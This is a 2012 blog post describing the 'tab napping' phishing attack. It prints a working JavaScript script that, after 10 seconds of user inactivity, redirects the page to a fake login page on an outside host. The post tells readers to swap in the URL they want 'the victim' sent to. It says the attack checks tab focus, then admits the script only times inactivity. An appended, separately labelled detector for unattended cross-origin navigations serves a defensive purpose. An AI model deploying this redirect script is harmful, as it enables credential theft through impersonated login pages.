Wednesday 26 September 2012

Tab Napping: A New Phishing Attack

Traditional phishing attacks are reasonably easy to avoid: just don’t click links in suspicious e-mails (or, for the really paranoid, any e-mail). But Firefox Creative Lead Aza Raskin has found a far more devious way to launch an attack: hijacking your unattended browser tabs.
The attack works by first detecting that the tab the page is in does not have focus. The attacking script can then change the tab's favicon and title before loading a new site, say a fake version of Gmail or Orkut, in the background. Even scarier, the attack can parse through your history to find sites you actually visit and impersonate them. Because most of us trust our tabs to remain on the page we left them on, this is a particularly difficult attack to detect. As Raskin writes, “as the user scans their many open tabs, the favicon and title act as a strong visual cue — memory is malleable and moldable and the user will most likely simply think they left [the] tab open.” The only clue that you’re being tricked is that the URL will be wrong.

The script used is shown below:

<a> open this in a tab of your browser and wait for 10 seconds and see after you come back but leave this page and go to other tab to see this magic.</a>
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;

function initRedirect(){
    if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
        xScroll = document.body.scrollLeft;
        yScroll = document.body.scrollTop;
        clearInterval(timerPoll); //stop polling scroll move
        clearInterval(timerRedirect); //stop timed redirect
        timerPoll = setInterval("pollActivity()",1); //poll scrolling
        timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed redirect
    }
    else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
        xScroll = window.pageXOffset;
        yScroll = window.pageYOffset;
        clearInterval(timerPoll); //stop polling scroll move
        clearInterval(timerRedirect); //stop timed redirect
        timerPoll = setInterval("pollActivity()",1); //poll scrolling
        timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed redirect
    }
    //else do nothing
}

function pollActivity(){
    if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft || yScroll!=document.body.scrollTop)) //IE/NS7/Moz
        ||
        (typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) { //other browsers
        initRedirect(); //reset polling scroll position
    }
}

document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>


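To see a demo of this attack, click here.
Replace the URL highlighted here with the URL you want the victim redirected to.
Use this script in a page, and the page will redirect after 10 seconds when the user is not on that tab. The script does not check tab focus directly: every mouse move, click, key press, resize or scroll restarts the 10-second timer, so the redirect fires once the page has seen no activity for that long.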
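A defender-side view of the behaviour described above, as an added example that is not part of the original post: it replays a constructed tab-event timeline and flags any cross-origin navigation that no recent user input in that tab explains, which is the trace both a focus-based and an inactivity-based redirect leave behind. The event shape, the name `findUnattendedNavigations`, the 1-second window and every hostname are assumptions.

```javascript
// Added example, not from the original post. Event shape and names are assumptions.
const ACTIVATION_WINDOW_MS = 1000; // assumed: navigation this soon after input is user-driven

// Flags cross-origin navigations that no recent user input in that tab explains.
function findUnattendedNavigations(events, windowMs = ACTIVATION_WINDOW_MS) {
  const tabs = new Map(); // tabId -> { origin, lastInput, focused }
  const alerts = [];
  for (const ev of events) {
    if (!tabs.has(ev.tabId)) {
      tabs.set(ev.tabId, { origin: null, lastInput: -Infinity, focused: false });
    }
    const tab = tabs.get(ev.tabId);
    if (ev.type === "focus") tab.focused = true;
    else if (ev.type === "blur") tab.focused = false;
    else if (ev.type === "input") tab.lastInput = ev.t;
    else if (ev.type === "navigate") {
      let next;
      try { next = new URL(ev.url).origin; } catch { continue; } // skip unparsable URLs
      const idleMs = ev.t - tab.lastInput;
      // The first load of a tab (origin === null) is never flagged.
      if (tab.origin !== null && next !== tab.origin && idleMs > windowMs) {
        alerts.push({ tabId: ev.tabId, t: ev.t, from: tab.origin, to: next,
                      idleMs, tabFocused: tab.focused });
      }
      tab.origin = next;
    }
  }
  return alerts;
}

// Constructed timeline (t in ms); every hostname is a placeholder.
const sampleEvents = [
  { t: 0,     tabId: 1, type: "focus" },
  { t: 10,    tabId: 1, type: "navigate", url: "https://blog.example/post" },
  { t: 500,   tabId: 1, type: "input" },
  { t: 900,   tabId: 1, type: "navigate", url: "https://shop.example/cart" }, // link click
  { t: 1000,  tabId: 1, type: "blur" },
  { t: 1000,  tabId: 2, type: "focus" },
  { t: 1100,  tabId: 2, type: "navigate", url: "https://news.example/" },
  { t: 11000, tabId: 1, type: "navigate", url: "https://login.lookalike.example/signin" },
  { t: 12000, tabId: 2, type: "input" },
  { t: 12200, tabId: 2, type: "navigate", url: "https://news.example/sports" },
];

for (const a of findUnattendedNavigations(sampleEvents)) {
  console.log(`tab ${a.tabId}: ${a.from} -> ${a.to} after ${a.idleMs} ms idle, focused=${a.tabFocused}`);
}
```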
